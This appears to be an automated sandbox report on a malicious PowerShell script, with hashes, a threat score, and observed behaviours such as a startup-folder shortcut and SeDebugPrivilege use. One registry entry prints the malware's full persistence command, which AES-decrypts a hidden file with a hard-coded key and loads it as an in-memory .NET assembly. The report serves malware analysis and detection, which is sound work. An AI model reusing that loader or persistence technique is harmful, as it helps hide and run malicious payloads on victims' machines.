c33f7334f8e7d0457c5205b38b7e8e8411725f74ac9b1b65247db3fcec3707e1

Analysis

max time kernel
234s
max time network
336s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ctimcjg4e8wf95rzus5c35nh8e70fd0i.ps1
Size

878KB
MD5

af7f2bd24517894733344dacbdbbaf25
SHA1

ee5a694d2753e82d24f40a7fb635488d7811209a
SHA256

c33f7334f8e7d0457c5205b38b7e8e8411725f74ac9b1b65247db3fcec3707e1
SHA512

d61d867652a5a0f7b290a2f68ce49754060a71d2a56a093c99fe6e52993ad0c8cc716a0b3624c3f133f7fc570a5b1d258814be4b4f9bcc8a2d9ad3a3b07efcff
SSDEEP

24576:uHykUQyHP0Q40o49QT/u5zYZO30ImX/ftNgwT7q:opyv1PfFNA/l4

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xtRcSBvielWbZrrkeBjz.lnk powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xtRcSBvielWbZrrkeBjz.lnk	powershell.exe

Modifies registry class 7 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.tGVkSzvcXtSEUEmDU	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.tGVkSzvcXtSEUEmDU\ = "rehjefjrcdcujajwcedbtyztbxjplyw"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\RehjeFJrcDcUjaJwcEdBTyZtBXjPLYw\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\RehjeFJrcDcUjaJwcEdBTyZtBXjPLYw	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\RehjeFJrcDcUjaJwcEdBTyZtBXjPLYw\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\RehjeFJrcDcUjaJwcEdBTyZtBXjPLYw\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\RehjeFJrcDcUjaJwcEdBTyZtBXjPLYw\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]255,197,72,222,124,12,5,108,46,176,21,72,78,25,15,43,43,149,61,238,68,52,41,125,115,112,65,223,172,28,133,194);$A.IV=@([byte]1,8,167,0,223,219,181,123,202,151,254,193,9,123,138,23);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\pPLEkgsZkuohtaP.tGVkSzvcXtSEUEmDU'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[YC867ZzH6h3ozC23QW5ogKq5OjastrzaM4EX01duB.klxq08iGfRlDnIXfDmph8VaLJfz8OMJr6p0jXYAWqKMWf36hNn1U1Z9I0]::MfelXThFHD2BgS3xv0wiuFkybGIapwv9G44dMW0MODskwNwkUhAwMyXIBgrb502GZXM();\""	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1712 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1712 powershell.exe

pid	process
1712	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1712	powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ctimcjg4e8wf95rzus5c35nh8e70fd0i.ps1
1⤵
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1712-54-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

Filesize
8KB

Download
memory/1712-55-0x000007FEF3340000-0x000007FEF3D63000-memory.dmp

Filesize
10.1MB

Download
memory/1712-57-0x0000000002784000-0x0000000002787000-memory.dmp

Filesize
12KB

Download
memory/1712-56-0x000007FEF2720000-0x000007FEF327D000-memory.dmp

Filesize
11.4MB

Download
memory/1712-58-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1712-59-0x000000000278B000-0x00000000027AA000-memory.dmp

Filesize
124KB

Download
memory/1712-61-0x000000000278B000-0x00000000027AA000-memory.dmp

Filesize
124KB

Download
memory/1712-60-0x0000000002784000-0x0000000002787000-memory.dmp

Filesize
12KB

Download